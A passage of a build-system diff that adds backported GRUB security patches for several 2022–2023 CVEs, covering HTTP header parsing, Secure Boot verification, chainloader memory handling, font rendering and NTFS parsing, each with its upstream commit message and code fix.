+ + (nb->tail - nb->data));
+- rsm->total_len -= ((iph->verhdrlen & 0xf) * sizeof (grub_uint32_t));
++
++ if (grub_sub (rsm->total_len, (iph->verhdrlen & 0xf) * sizeof (grub_uint32_t),
++ &rsm->total_len))
++ {
++ grub_dprintf ("net", "IP reassembly size underflow\n");
++ return GRUB_ERR_NONE;
++ }
++
+ rsm->asm_netbuff = grub_netbuff_alloc (rsm->total_len);
+ if (!rsm->asm_netbuff)
+ {
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28734.patch b/meta/recipes-bsp/grub/files/CVE-2022-28734.patch
new file mode 100644
index 0000000000..577ec10bea
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28734.patch
@@ -0,0 +1,67 @@
+From f03f09c2a07eae7f3a4646e33a406ae2689afb9e Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 1 Aug 2022 10:59:41 +0530
+Subject: [PATCH] CVE-2022-28734
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=b26b4c08e7119281ff30d0fb4a6169bd2afa8fe4]
+CVE: CVE-2022-28734
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+net/http: Fix OOB write for split http headers
+
+GRUB has special code for handling an http header that is split
+across two packets.
+
+The code tracks the end of line by looking for a "\n" byte. The
+code for split headers has always advanced the pointer just past the
+end of the line, whereas the code that handles unsplit headers does
+not advance the pointer. This extra advance causes the length to be
+one greater, which breaks an assumption in parse_line(), leading to
+it writing a NUL byte one byte past the end of the buffer where we
+reconstruct the line from the two packets.
+
+It's conceivable that an attacker controlled set of packets could
+cause this to zero out the first byte of the "next" pointer of the
+grub_mm_region structure following the current_line buffer.
+
+Do not advance the pointer in the split header case.
+
+Fixes: CVE-2022-28734
+---
+ grub-core/net/http.c | 12 +++++++++---
+ 1 file changed, 9 insertions(+), 3 deletions(-)
+
+diff --git a/grub-core/net/http.c b/grub-core/net/http.c
+index 5aa4ad3..a220d21 100644
+--- a/grub-core/net/http.c
++++ b/grub-core/net/http.c
+@@ -68,7 +68,15 @@ parse_line (grub_file_t file, http_data_t data, char *ptr, grub_size_t len)
+ char *end = ptr + len;
+ while (end > ptr && *(end - 1) == '\r')
+ end--;
++
++ /* LF without CR. */
++ if (end == ptr + len)
++ {
++ data->errmsg = grub_strdup (_("invalid HTTP header - LF without CR"));
++ return GRUB_ERR_NONE;
++ }
+ *end = 0;
++
+ /* Trailing CRLF. */
+ if (data->in_chunk_len == 1)
+ {
+@@ -190,9 +198,7 @@ http_receive (grub_net_tcp_socket_t sock __attribute__ ((unused)),
+ int have_line = 1;
+ char *t;
+ ptr = grub_memchr (nb->data, '\n', nb->tail - nb->data);
+- if (ptr)
+- ptr++;
+- else
++ if (ptr == NULL)
+ {
+ have_line = 0;
+ ptr = (char *) nb->tail;
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28735.patch b/meta/recipes-bsp/grub/files/CVE-2022-28735.patch
new file mode 100644
index 0000000000..89b653a8da
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28735.patch
@@ -0,0 +1,271 @@
+From 6fe755c5c07bb386fda58306bfd19e4a1c974c53 Mon Sep 17 00:00:00 2001
+From: Julian Andres Klode <julian.klode@canonical.com>
+Date: Thu, 2 Dec 2021 15:03:53 +0100
+Subject: kern/efi/sb: Reject non-kernel files in the shim_lock verifier
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6fe755c5c07bb386fda58306bfd19e4a1c974c53]
+CVE: CVE-2022-28735
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+We must not allow other verifiers to pass things like the GRUB modules.
+Instead of maintaining a blocklist, maintain an allowlist of things
+that we do not care about.
+
+This allowlist really should be made reusable, and shared by the
+lockdown verifier, but this is the minimal patch addressing
+security concerns where the TPM verifier was able to mark modules
+as verified (or the OpenPGP verifier for that matter), when it
+should not do so on shim-powered secure boot systems.
+
+Fixes: CVE-2022-28735
+
+Signed-off-by: Julian Andres Klode <julian.klode@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/kern/efi/sb.c | 221 ++++++++++++++++++++++++++++++++++++++++
+ include/grub/verify.h | 1 +
+ 2 files changed, 222 insertions(+)
+ create mode 100644 grub-core/kern/efi/sb.c
+
+diff --git a/grub-core/kern/efi/sb.c b/grub-core/kern/efi/sb.c
+new file mode 100644
+index 0000000..89c4bb3
+--- /dev/null
++++ b/grub-core/kern/efi/sb.c
+@@ -0,0 +1,221 @@
++/*
++ * GRUB -- GRand Unified Bootloader
++ * Copyright (C) 2020 Free Software Foundation, Inc.
++ *
++ * GRUB is free software: you can redistribute it and/or modify
++ * it under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GRUB is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
++ *
++ * UEFI Secure Boot related checks.
++ */
++
++#include <grub/efi/efi.h>
++#include <grub/efi/pe32.h>
++#include <grub/efi/sb.h>
++#include <grub/env.h>
++#include <grub/err.h>
++#include <grub/file.h>
++#include <grub/i386/linux.h>
++#include <grub/kernel.h>
++#include <grub/mm.h>
++#include <grub/types.h>
++#include <grub/verify.h>
++
++static grub_efi_guid_t shim_lock_guid = GRUB_EFI_SHIM_LOCK_GUID;
++
++/*
++ * Determine whether we're in secure boot mode.
++ *
++ * Please keep the logic in sync with the Linux kernel,
++ * drivers/firmware/efi/libstub/secureboot.c:efi_get_secureboot().
++ */
++grub_uint8_t
++grub_efi_get_secureboot (void)
++{
++ static grub_efi_guid_t efi_variable_guid = GRUB_EFI_GLOBAL_VARIABLE_GUID;
++ grub_efi_status_t status;
++ grub_efi_uint32_t attr = 0;
++ grub_size_t size = 0;
++ grub_uint8_t *secboot = NULL;
++ grub_uint8_t *setupmode = NULL;
++ grub_uint8_t *moksbstate = NULL;
++ grub_uint8_t secureboot = GRUB_EFI_SECUREBOOT_MODE_UNKNOWN;
++ const char *secureboot_str = "UNKNOWN";
++
++ status = grub_efi_get_variable ("SecureBoot", &efi_variable_guid,
++ &size, (void **) &secboot);
++
++ if (status == GRUB_EFI_NOT_FOUND)
++ {
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
++ goto out;
++ }
++
++ if (status != GRUB_EFI_SUCCESS)
++ goto out;
++
++ status = grub_efi_get_variable ("SetupMode", &efi_variable_guid,
++ &size, (void **) &setupmode);
++
++ if (status != GRUB_EFI_SUCCESS)
++ goto out;
++
++ if ((*secboot == 0) || (*setupmode == 1))
++ {
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
++ goto out;
++ }
++
++ /*
++ * See if a user has put the shim into insecure mode. If so, and if the
++ * variable doesn't have the runtime attribute set, we might as well
++ * honor that.
++ */
++ status = grub_efi_get_variable_with_attributes ("MokSBState", &shim_lock_guid,
++ &size, (void **) &moksbstate, &attr);
++
++ /* If it fails, we don't care why. Default to secure. */
++ if (status != GRUB_EFI_SUCCESS)
++ {
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_ENABLED;
++ goto out;
++ }
++
++ if (!(attr & GRUB_EFI_VARIABLE_RUNTIME_ACCESS) && *moksbstate == 1)
++ {
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
++ goto out;
++ }
++
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_ENABLED;
++
++ out:
++ grub_free (moksbstate);
++ grub_free (setupmode);
++ grub_free (secboot);
++
++ if (secureboot == GRUB_EFI_SECUREBOOT_MODE_DISABLED)
++ secureboot_str = "Disabled";
++ else if (secureboot == GRUB_EFI_SECUREBOOT_MODE_ENABLED)
++ secureboot_str = "Enabled";
++
++ grub_dprintf ("efi", "UEFI Secure Boot state: %s\n", secureboot_str);
++
++ return secureboot;
++}
++
++static grub_err_t
++shim_lock_verifier_init (grub_file_t io __attribute__ ((unused)),
++ enum grub_file_type type,
++ void **context __attribute__ ((unused)),
++ enum grub_verify_flags *flags)
++{
++ *flags = GRUB_VERIFY_FLAGS_NONE;
++
++ switch (type & GRUB_FILE_TYPE_MASK)
++ {
++ /* Files we check. */
++ case GRUB_FILE_TYPE_LINUX_KERNEL:
++ case GRUB_FILE_TYPE_MULTIBOOT_KERNEL:
++ case GRUB_FILE_TYPE_BSD_KERNEL:
++ case GRUB_FILE_TYPE_XNU_KERNEL:
++ case GRUB_FILE_TYPE_PLAN9_KERNEL:
++ case GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE:
++ *flags = GRUB_VERIFY_FLAGS_SINGLE_CHUNK;
++ return GRUB_ERR_NONE;
++
++ /* Files that do not affect secureboot state. */
++ case GRUB_FILE_TYPE_NONE:
++ case GRUB_FILE_TYPE_LOOPBACK:
++ case GRUB_FILE_TYPE_LINUX_INITRD:
++ case GRUB_FILE_TYPE_OPENBSD_RAMDISK:
++ case GRUB_FILE_TYPE_XNU_RAMDISK:
++ case GRUB_FILE_TYPE_SIGNATURE:
++ case GRUB_FILE_TYPE_PUBLIC_KEY:
++ case GRUB_FILE_TYPE_PUBLIC_KEY_TRUST:
++ case GRUB_FILE_TYPE_PRINT_BLOCKLIST:
++ case GRUB_FILE_TYPE_TESTLOAD:
++ case GRUB_FILE_TYPE_GET_SIZE:
++ case GRUB_FILE_TYPE_FONT:
++ case GRUB_FILE_TYPE_ZFS_ENCRYPTION_KEY:
++ case GRUB_FILE_TYPE_CAT:
++ case GRUB_FILE_TYPE_HEXCAT:
++ case GRUB_FILE_TYPE_CMP:
++ case GRUB_FILE_TYPE_HASHLIST:
++ case GRUB_FILE_TYPE_TO_HASH:
++ case GRUB_FILE_TYPE_KEYBOARD_LAYOUT:
++ case GRUB_FILE_TYPE_PIXMAP:
++ case GRUB_FILE_TYPE_GRUB_MODULE_LIST:
++ case GRUB_FILE_TYPE_CONFIG:
++ case GRUB_FILE_TYPE_THEME:
++ case GRUB_FILE_TYPE_GETTEXT_CATALOG:
++ case GRUB_FILE_TYPE_FS_SEARCH:
++ case GRUB_FILE_TYPE_LOADENV:
++ case GRUB_FILE_TYPE_SAVEENV:
++ case GRUB_FILE_TYPE_VERIFY_SIGNATURE:
++ *flags = GRUB_VERIFY_FLAGS_SKIP_VERIFICATION;
++ return GRUB_ERR_NONE;
++
++ /* Other files. */
++ default:
++ return grub_error (GRUB_ERR_ACCESS_DENIED, N_("prohibited by secure boot policy"));
++ }
++}
++
++static grub_err_t
++shim_lock_verifier_write (void *context __attribute__ ((unused)), void *buf, grub_size_t size)
++{
++ grub_efi_shim_lock_protocol_t *sl = grub_efi_locate_protocol (&shim_lock_guid, 0);
++
++ if (!sl)
++ return grub_error (GRUB_ERR_ACCESS_DENIED, N_("shim_lock protocol not found"));
++
++ if (sl->verify (buf, size) != GRUB_EFI_SUCCESS)
++ return grub_error (GRUB_ERR_BAD_SIGNATURE, N_("bad shim signature"));
++
++ return GRUB_ERR_NONE;
++}
++
++struct grub_file_verifier shim_lock_verifier =
++ {
++ .name = "shim_lock_verifier",
++ .init = shim_lock_verifier_init,
++ .write = shim_lock_verifier_write
++ };
++
++void
++grub_shim_lock_verifier_setup (void)
++{
++ struct grub_module_header *header;
++ grub_efi_shim_lock_protocol_t *sl =
++ grub_efi_locate_protocol (&shim_lock_guid, 0);
++
++ /* shim_lock is missing, check if GRUB image is built with --disable-shim-lock. */
++ if (!sl)
++ {
++ FOR_MODULES (header)
++ {
++ if (header->type == OBJ_TYPE_DISABLE_SHIM_LOCK)
++ return;
++ }
++ }
++
++ /* Secure Boot is off. Do not load shim_lock. */
++ if (grub_efi_get_secureboot () != GRUB_EFI_SECUREBOOT_MODE_ENABLED)
++ return;
++
++ /* Enforce shim_lock_verifier. */
++ grub_verifier_register (&shim_lock_verifier);
++
++ grub_env_set ("shim_lock", "y");
++ grub_env_export ("shim_lock");
++}
+diff --git a/include/grub/verify.h b/include/grub/verify.h
+index cd129c3..672ae16 100644
+--- a/include/grub/verify.h
++++ b/include/grub/verify.h
+@@ -24,6 +24,7 @@
+
+ enum grub_verify_flags
+ {
++ GRUB_VERIFY_FLAGS_NONE = 0,
+ GRUB_VERIFY_FLAGS_SKIP_VERIFICATION = 1,
+ GRUB_VERIFY_FLAGS_SINGLE_CHUNK = 2,
+ /* Defer verification to another authority. */
+--
+2.25.1
+
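The verifier above is deliberately default-deny: file types that must be verified are listed first, types that cannot affect the Secure Boot state are explicitly skipped, and anything unrecognized is rejected rather than silently allowed. A small sketch of that dispatch shape, with invented file-type names rather than the real GRUB_FILE_TYPE_* values:

#include <stdio.h>

enum file_type { FT_KERNEL, FT_INITRD, FT_CONFIG, FT_MODULE };
enum verdict { VERIFY, SKIP, DENY };

static enum verdict
classify (enum file_type t)
{
  switch (t)
    {
    case FT_KERNEL:      /* files we must verify */
      return VERIFY;

    case FT_INITRD:      /* files that cannot affect the secure boot state */
    case FT_CONFIG:
      return SKIP;

    default:             /* everything else is prohibited */
      return DENY;
    }
}

int
main (void)
{
  printf ("kernel -> %d\n", classify (FT_KERNEL));
  printf ("module -> %d\n", classify (FT_MODULE));   /* DENY, not SKIP */
  return 0;
}
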
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28736.patch b/meta/recipes-bsp/grub/files/CVE-2022-28736.patch
new file mode 100644
index 0000000000..4fc9fdaf05
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28736.patch
@@ -0,0 +1,275 @@
+From 431a111c60095fc973d83fe9209f26f29ce78784 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 1 Aug 2022 11:17:17 +0530
+Subject: [PATCH] CVE-2022-28736
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=04c86e0bb7b58fc2f913f798cdb18934933e532d]
+CVE: CVE-2022-28736
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+loader/efi/chainloader: Use grub_loader_set_ex()
+
+This ports the EFI chainloader to use grub_loader_set_ex() in order to fix
+a use-after-free bug that occurs when grub_cmd_chainloader() is executed
+more than once before a boot attempt is performed.
+
+Fixes: CVE-2022-28736
+
+Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/commands/boot.c | 66 ++++++++++++++++++++++++++----
+ grub-core/loader/efi/chainloader.c | 46 +++++++++++----------
+ include/grub/loader.h | 5 +++
+ 3 files changed, 87 insertions(+), 30 deletions(-)
+
+diff --git a/grub-core/commands/boot.c b/grub-core/commands/boot.c
+index bbca81e..6151478 100644
+--- a/grub-core/commands/boot.c
++++ b/grub-core/commands/boot.c
+@@ -27,10 +27,20 @@
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+-static grub_err_t (*grub_loader_boot_func) (void);
+-static grub_err_t (*grub_loader_unload_func) (void);
++static grub_err_t (*grub_loader_boot_func) (void *context);
++static grub_err_t (*grub_loader_unload_func) (void *context);
++static void *grub_loader_context;
+ static int grub_loader_flags;
+
++struct grub_simple_loader_hooks
++{
++ grub_err_t (*boot) (void);
++ grub_err_t (*unload) (void);
++};
++
++/* Don't heap allocate this to avoid making grub_loader_set() fallible. */
++static struct grub_simple_loader_hooks simple_loader_hooks;
++
+ struct grub_preboot
+ {
+ grub_err_t (*preboot_func) (int);
+@@ -44,6 +54,29 @@ static int grub_loader_loaded;
+ static struct grub_preboot *preboots_head = 0,
+ *preboots_tail = 0;
+
++static grub_err_t
++grub_simple_boot_hook (void *context)
++{
++ struct grub_simple_loader_hooks *hooks;
++
++ hooks = (struct grub_simple_loader_hooks *) context;
++ return hooks->boot ();
++}
++
++static grub_err_t
++grub_simple_unload_hook (void *context)
++{
++ struct grub_simple_loader_hooks *hooks;
++ grub_err_t ret;
++
++ hooks = (struct grub_simple_loader_hooks *) context;
++
++ ret = hooks->unload ();
++ grub_memset (hooks, 0, sizeof (*hooks));
++
++ return ret;
++}
++
+ int
+ grub_loader_is_loaded (void)
+ {
+@@ -110,28 +143,45 @@ grub_loader_unregister_preboot_hook (struct grub_preboot *hnd)
+ }
+
+ void
+-grub_loader_set (grub_err_t (*boot) (void),
+- grub_err_t (*unload) (void),
+- int flags)
++grub_loader_set_ex (grub_err_t (*boot) (void *context),
++ grub_err_t (*unload) (void *context),
++ void *context,
++ int flags)
+ {
+ if (grub_loader_loaded && grub_loader_unload_func)
+- grub_loader_unload_func ();
++ grub_loader_unload_func (grub_loader_context);
+
+ grub_loader_boot_func = boot;
+ grub_loader_unload_func = unload;
++ grub_loader_context = context;
+ grub_loader_flags = flags;
+
+ grub_loader_loaded = 1;
+ }
+
++void
++grub_loader_set (grub_err_t (*boot) (void),
++ grub_err_t (*unload) (void),
++ int flags)
++{
++ grub_loader_set_ex (grub_simple_boot_hook,
++ grub_simple_unload_hook,
++ &simple_loader_hooks,
++ flags);
++
++ simple_loader_hooks.boot = boot;
++ simple_loader_hooks.unload = unload;
++}
++
+ void
+ grub_loader_unset(void)
+ {
+ if (grub_loader_loaded && grub_loader_unload_func)
+- grub_loader_unload_func ();
++ grub_loader_unload_func (grub_loader_context);
+
+ grub_loader_boot_func = 0;
+ grub_loader_unload_func = 0;
++ grub_loader_context = 0;
+
+ grub_loader_loaded = 0;
+ }
+@@ -158,7 +208,7 @@ grub_loader_boot (void)
+ return err;
+ }
+ }
+- err = (grub_loader_boot_func) ();
++ err = (grub_loader_boot_func) (grub_loader_context);
+
+ for (cur = preboots_tail; cur; cur = cur->prev)
+ if (! err)
+diff --git a/grub-core/loader/efi/chainloader.c b/grub-core/loader/efi/chainloader.c
+index a8d7b91..93a028a 100644
+--- a/grub-core/loader/efi/chainloader.c
++++ b/grub-core/loader/efi/chainloader.c
+@@ -44,33 +44,28 @@ GRUB_MOD_LICENSE ("GPLv3+");
+
+ static grub_dl_t my_mod;
+
+-static grub_efi_physical_address_t address;
+-static grub_efi_uintn_t pages;
+-static grub_efi_device_path_t *file_path;
+-static grub_efi_handle_t image_handle;
+-static grub_efi_char16_t *cmdline;
+-
+ static grub_err_t
+-grub_chainloader_unload (void)
++grub_chainloader_unload (void *context)
+ {
++ grub_efi_handle_t image_handle = (grub_efi_handle_t) context;
++ grub_efi_loaded_image_t *loaded_image;
+ grub_efi_boot_services_t *b;
+
++ loaded_image = grub_efi_get_loaded_image (image_handle);
++ if (loaded_image != NULL)
++ grub_free (loaded_image->load_options);
++
+ b = grub_efi_system_table->boot_services;
+ efi_call_1 (b->unload_image, image_handle);
+- efi_call_2 (b->free_pages, address, pages);
+-
+- grub_free (file_path);
+- grub_free (cmdline);
+- cmdline = 0;
+- file_path = 0;
+
+ grub_dl_unref (my_mod);
+ return GRUB_ERR_NONE;
+ }
+
+ static grub_err_t
+-grub_chainloader_boot (void)
++grub_chainloader_boot (void *context)
+ {
++ grub_efi_handle_t image_handle = (grub_efi_handle_t) context;
+ grub_efi_boot_services_t *b;
+ grub_efi_status_t status;
+ grub_efi_uintn_t exit_data_size;
+@@ -139,7 +134,7 @@ make_file_path (grub_efi_device_path_t *dp, const char *filename)
+ char *dir_start;
+ char *dir_end;
+ grub_size_t size;
+- grub_efi_device_path_t *d;
++ grub_efi_device_path_t *d, *file_path;
+
+ dir_start = grub_strchr (filename, ')');
+ if (! dir_start)
+@@ -215,11 +210,15 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+ grub_efi_status_t status;
+ grub_efi_boot_services_t *b;
+ grub_device_t dev = 0;
+- grub_efi_device_path_t *dp = 0;
++ grub_efi_device_path_t *dp = NULL, *file_path = NULL;
+ grub_efi_loaded_image_t *loaded_image;
+ char *filename;
+ void *boot_image = 0;
+ grub_efi_handle_t dev_handle = 0;
++ grub_efi_physical_address_t address = 0;
++ grub_efi_uintn_t pages = 0;
++ grub_efi_char16_t *cmdline = NULL;
++ grub_efi_handle_t image_handle = NULL;
+
+ if (argc == 0)
+ return grub_error (GRUB_ERR_BAD_ARGUMENT, N_("filename expected"));
+@@ -227,11 +226,6 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+
+ grub_dl_ref (my_mod);
+
+- /* Initialize some global variables. */
+- address = 0;
+- image_handle = 0;
+- file_path = 0;
+-
+ b = grub_efi_system_table->boot_services;
+
+ file = grub_file_open (filename, GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE);
+@@ -401,7 +395,11 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+ grub_file_close (file);
+ grub_device_close (dev);
+
+- grub_loader_set (grub_chainloader_boot, grub_chainloader_unload, 0);
++ /* We're finished with the source image buffer and file path now. */
++ efi_call_2 (b->free_pages, address, pages);
++ grub_free (file_path);
++
++ grub_loader_set_ex (grub_chainloader_boot, grub_chainloader_unload, image_handle, 0);
+ return 0;
+
+ fail:
+@@ -412,11 +410,15 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+ if (file)
+ grub_file_close (file);
+
++ grub_free (cmdline);
+ grub_free (file_path);
+
+ if (address)
+ efi_call_2 (b->free_pages, address, pages);
+
++ if (image_handle != NULL)
++ efi_call_1 (b->unload_image, image_handle);
++
+ grub_dl_unref (my_mod);
+
+ return grub_errno;
+diff --git a/include/grub/loader.h b/include/grub/loader.h
+index 7f82a49..3071a50 100644
+--- a/include/grub/loader.h
++++ b/include/grub/loader.h
+@@ -39,6 +39,11 @@ void EXPORT_FUNC (grub_loader_set) (grub_err_t (*boot) (void),
+ grub_err_t (*unload) (void),
+ int flags);
+
++void EXPORT_FUNC (grub_loader_set_ex) (grub_err_t (*boot) (void *context),
++ grub_err_t (*unload) (void *context),
++ void *context,
++ int flags);
++
+ /* Unset current loader, if any. */
+ void EXPORT_FUNC (grub_loader_unset) (void);
+
+--
+2.25.1
+
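The core of the chainloader change is the move from file-scope globals to a context pointer passed through grub_loader_set_ex(), with the old no-argument hooks adapted through a static "simple hooks" struct. A stripped-down model of that arrangement (the unload hook and flags are omitted, and the names are illustrative, not the GRUB API):

#include <stdio.h>

typedef int (*boot_ex_fn) (void *context);

struct simple_hooks
{
  int (*boot) (void);
};

static boot_ex_fn current_boot;
static void *current_context;
static struct simple_hooks simple_hooks;

static int
simple_boot_adapter (void *context)
{
  struct simple_hooks *h = context;
  return h->boot ();
}

static void
loader_set_ex (boot_ex_fn boot, void *context)
{
  current_boot = boot;
  current_context = context;
}

static void
loader_set (int (*boot) (void))
{
  loader_set_ex (simple_boot_adapter, &simple_hooks);
  simple_hooks.boot = boot;
}

static int
legacy_boot (void)
{
  puts ("legacy boot");
  return 0;
}

static int
chain_boot (void *context)
{
  printf ("chainload image handle %p\n", context);
  return 0;
}

int
main (void)
{
  int dummy_image;

  loader_set (legacy_boot);                  /* old callers keep working */
  current_boot (current_context);

  loader_set_ex (chain_boot, &dummy_image);  /* per-invocation state */
  current_boot (current_context);
  return 0;
}
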
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-3775.patch b/meta/recipes-bsp/grub/files/CVE-2022-3775.patch
new file mode 100644
index 0000000000..e2e3f35584
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-3775.patch
@@ -0,0 +1,97 @@
+From fdbe7209152ad6f09a1166f64f162017f2145ba3 Mon Sep 17 00:00:00 2001
+From: Zhang Boyang <zhangboyang.id@gmail.com>
+Date: Mon, 24 Oct 2022 08:05:35 +0800
+Subject: [PATCH] font: Fix an integer underflow in blit_comb()
+
+The expression (ctx.bounds.height - combining_glyphs[i]->height) / 2 may
+evaluate to a very big invalid value even if both ctx.bounds.height and
+combining_glyphs[i]->height are small integers. For example, if
+ctx.bounds.height is 10 and combining_glyphs[i]->height is 12, this
+expression evaluates to 2147483647 (expected -1). This is because
+coordinates are allowed to be negative but ctx.bounds.height is an
+unsigned int. So, the subtraction operates on unsigned ints and
+underflows to a very big value. The division makes things even worse.
+The quotient is still an invalid value even if converted back to int.
+
+This patch fixes the problem by casting ctx.bounds.height to int. As
+a result the subtraction will operate on int and grub_uint16_t which
+will be promoted to an int. So, the underflow will no longer happen. Other
+uses of ctx.bounds.height (and ctx.bounds.width) are also casted to int,
+to ensure coordinates are always calculated on signed integers.
+
+Fixes: CVE-2022-3775
+
+Reported-by: Daniel Axtens <dja@axtens.net>
+Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=992c06191babc1e109caf40d6a07ec6fdef427af]
+CVE: CVE-2022-3775
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/font/font.c | 16 ++++++++--------
+ 1 file changed, 8 insertions(+), 8 deletions(-)
+
+diff --git a/grub-core/font/font.c b/grub-core/font/font.c
+index f110db9..3b76b22 100644
+--- a/grub-core/font/font.c
++++ b/grub-core/font/font.c
+@@ -1200,12 +1200,12 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+ ctx.bounds.height = main_glyph->height;
+
+ above_rightx = main_glyph->offset_x + main_glyph->width;
+- above_righty = ctx.bounds.y + ctx.bounds.height;
++ above_righty = ctx.bounds.y + (int) ctx.bounds.height;
+
+ above_leftx = main_glyph->offset_x;
+- above_lefty = ctx.bounds.y + ctx.bounds.height;
++ above_lefty = ctx.bounds.y + (int) ctx.bounds.height;
+
+- below_rightx = ctx.bounds.x + ctx.bounds.width;
++ below_rightx = ctx.bounds.x + (int) ctx.bounds.width;
+ below_righty = ctx.bounds.y;
+
+ comb = grub_unicode_get_comb (glyph_id);
+@@ -1218,7 +1218,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+
+ if (!combining_glyphs[i])
+ continue;
+- targetx = (ctx.bounds.width - combining_glyphs[i]->width) / 2 + ctx.bounds.x;
++ targetx = ((int) ctx.bounds.width - combining_glyphs[i]->width) / 2 + ctx.bounds.x;
+ /* CGJ is to avoid diacritics reordering. */
+ if (comb[i].code
+ == GRUB_UNICODE_COMBINING_GRAPHEME_JOINER)
+@@ -1228,8 +1228,8 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+ case GRUB_UNICODE_COMB_OVERLAY:
+ do_blit (combining_glyphs[i],
+ targetx,
+- (ctx.bounds.height - combining_glyphs[i]->height) / 2
+- - (ctx.bounds.height + ctx.bounds.y), &ctx);
++ ((int) ctx.bounds.height - combining_glyphs[i]->height) / 2
++ - ((int) ctx.bounds.height + ctx.bounds.y), &ctx);
+ if (min_devwidth < combining_glyphs[i]->width)
+ min_devwidth = combining_glyphs[i]->width;
+ break;
+@@ -1302,7 +1302,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+ /* Fallthrough. */
+ case GRUB_UNICODE_STACK_ATTACHED_ABOVE:
+ do_blit (combining_glyphs[i], targetx,
+- -(ctx.bounds.height + ctx.bounds.y + space
++ -((int) ctx.bounds.height + ctx.bounds.y + space
+ + combining_glyphs[i]->height), &ctx);
+ if (min_devwidth < combining_glyphs[i]->width)
+ min_devwidth = combining_glyphs[i]->width;
+@@ -1310,7 +1310,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+
+ case GRUB_UNICODE_COMB_HEBREW_DAGESH:
+ do_blit (combining_glyphs[i], targetx,
+- -(ctx.bounds.height / 2 + ctx.bounds.y
++ -((int) ctx.bounds.height / 2 + ctx.bounds.y
+ + combining_glyphs[i]->height / 2), &ctx);
+ if (min_devwidth < combining_glyphs[i]->width)
+ min_devwidth = combining_glyphs[i]->width;
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2023-4692.patch b/meta/recipes-bsp/grub/files/CVE-2023-4692.patch
new file mode 100644
index 0000000000..0e74870ebf
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2023-4692.patch
@@ -0,0 +1,97 @@
+From 43651027d24e62a7a463254165e1e46e42aecdea Mon Sep 17 00:00:00 2001
+From: Maxim Suhanov <dfirblog@gmail.com>
+Date: Mon, 28 Aug 2023 16:31:57 +0300
+Subject: [PATCH] fs/ntfs: Fix an OOB write when parsing the $ATTRIBUTE_LIST
+ attribute for the $MFT file
+
+When parsing an extremely fragmented $MFT file, i.e., the file described
+using the $ATTRIBUTE_LIST attribute, current NTFS code will reuse a buffer
+containing bytes read from the underlying drive to store sector numbers,
+which are consumed later to read data from these sectors into another buffer.
+
+These sector numbers, two 32-bit integers, are always stored at predefined
+offsets, 0x10 and 0x14, relative to first byte of the selected entry within
+the $ATTRIBUTE_LIST attribute. Usually, this won't cause any problem.
+
+However, when parsing a specially-crafted file system image, this may cause
+the NTFS code to write these integers beyond the buffer boundary, likely
+causing the GRUB memory allocator to misbehave or fail. These integers contain
+values which are controlled by on-disk structures of the NTFS file system.
+
+Such modification and resulting misbehavior may touch a memory range not
+assigned to the GRUB and owned by firmware or another EFI application/driver.
+
+This fix introduces checks to ensure that these sector numbers are never
+written beyond the boundary.
+
+Fixes: CVE-2023-4692
+
+Reported-by: Maxim Suhanov <dfirblog@gmail.com>
+Signed-off-by: Maxim Suhanov <dfirblog@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
